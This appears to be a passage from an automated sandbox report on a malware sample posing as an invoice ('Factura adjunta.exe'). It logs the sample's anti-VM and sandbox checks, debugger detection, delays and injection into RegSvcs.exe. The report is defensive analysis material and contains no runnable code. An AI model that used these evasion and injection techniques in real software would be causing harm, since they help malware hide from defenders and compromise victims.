                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\Desktop\Factura adjunta.exeAPI/Special instruction interceptor: Address: 763224
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: RegSvcs.exe, 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4640275179.0000000002F57000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598731Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598580Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8011Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1796Jump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100409
                    Source: C:\Users\user\Desktop\Factura adjunta.exeAPI coverage: 4.8 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00814696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00814696
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0081C9C7
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081C93C FindFirstFileW,FindClose,0_2_0081C93C
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0081F200
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0081F35D
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0081F65E
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00813A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00813A2B
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00813D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00813D4E
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_0081BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0081BF27
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007B4AFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598731Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598580Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99870Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99279Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95610Jump to behavior
                    Source: RegSvcs.exe, 00000002.00000002.4640275179.0000000002F57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: RegSvcs.exe, 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vmware
                    Source: RegSvcs.exe, 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: RegSvcs.exe, 00000002.00000002.4642450316.0000000005483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Factura adjunta.exeAPI call chain: ExitProcess graph end nodegraph_0-100792
                    Source: C:\Users\user\Desktop\Factura adjunta.exeAPI call chain: ExitProcess graph end nodegraph_0-98649
                    Source: C:\Users\user\Desktop\Factura adjunta.exeAPI call chain: ExitProcess graph end nodegraph_0-98715
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_008241FD BlockInput,0_2_008241FD
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007B3B4C
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007E5CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_007E5CCC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_008D7080 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_008D7080
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007634F0 mov eax, dword ptr fs:[00000030h]0_2_007634F0
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00763490 mov eax, dword ptr fs:[00000030h]0_2_00763490
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00761E70 mov eax, dword ptr fs:[00000030h]0_2_00761E70
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_008081F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008081F7
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007DA364 SetUnhandledExceptionFilter,0_2_007DA364
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007DA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007DA395
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\Factura adjunta.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\Factura adjunta.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BF0008Jump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00808C93 LogonUserW,0_2_00808C93
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007B3B4C
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007B4A35
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00814EC9 mouse_event,0_2_00814EC9
                    Source: C:\Users\user\Desktop\Factura adjunta.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Factura adjunta.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_008081F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008081F7
